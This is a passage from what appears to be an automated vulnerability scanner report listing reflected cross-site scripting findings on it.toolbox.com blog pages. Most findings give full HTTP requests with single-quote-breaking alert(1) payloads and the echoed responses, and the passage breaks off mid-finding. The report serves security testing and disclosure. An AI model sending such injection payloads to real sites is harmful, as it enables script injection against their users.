3.67. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/plowing-sideways-43376

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55921'-alert(1)-'f69afd006fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/55921'-alert(1)-'f69afd006fa HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2655921'-alert(1)-'f69afd006fa';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.68. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/plowing-sideways-43376

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 923aa'-alert(1)-'5b66f60c6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/plowing-sideways-43376?923aa'-alert(1)-'5b66f60c6b0=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67973
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Plowing Sid
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43376%26923aa'-alert(1)-'5b66f60c6b0%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.69. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/roadmap-process-38207

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98151'-alert(1)-'1ad1be6a8fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/98151'-alert(1)-'1ad1be6a8fa HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2698151'-alert(1)-'1ad1be6a8fa';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.70. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/roadmap-process-38207

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b720d'-alert(1)-'7c71c4dd298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/roadmap-process-38207?b720d'-alert(1)-'7c71c4dd298=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73697
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Roadmap Pro
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38207%26b720d'-alert(1)-'7c71c4dd298%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.71. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/saas-marches-on-38509

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74a55'-alert(1)-'6ac004d8ab9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/74a55'-alert(1)-'6ac004d8ab9 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2674a55'-alert(1)-'6ac004d8ab9';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.72. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/saas-marches-on-38509

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f431'-alert(1)-'136d885acd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/saas-marches-on-38509?1f431'-alert(1)-'136d885acd9=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66969
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SaaS marche
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38509%261f431'-alert(1)-'136d885acd9%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.73. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/talent-curves-40195

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f308c'-alert(1)-'02badb2b125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/f308c'-alert(1)-'02badb2b125 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26f308c'-alert(1)-'02badb2b125';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.74. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/talent-curves-40195

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dcb'-alert(1)-'2669c2ff9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/talent-curves-40195?13dcb'-alert(1)-'2669c2ff9f=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85846
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Talent Curv
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40195%2613dcb'-alert(1)-'2669c2ff9f%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.75. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/technical-debt-revisiited-38720

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56d52'-alert(1)-'064c4d5504d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/56d52'-alert(1)-'064c4d5504d HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2656d52'-alert(1)-'064c4d5504d';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.76. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/technical-debt-revisiited-38720

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7966f'-alert(1)-'717976eea32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/technical-debt-revisiited-38720?7966f'-alert(1)-'717976eea32=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75648
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Technical D
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38720%267966f'-alert(1)-'717976eea32%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.77. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb910'-alert(1)-'cf3f8d419ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/cb910'-alert(1)-'cf3f8d419ca HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26cb910'-alert(1)-'cf3f8d419ca';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.78. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9947e'-alert(1)-'b768ccdb619 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620?9947e'-alert(1)-'b768ccdb619=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69445
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Check B
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42620%269947e'-alert(1)-'b768ccdb619%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.79. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-emergent-comedy-39924

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb19'-alert(1)-'c89de4fa829 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/6fb19'-alert(1)-'c89de4fa829 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
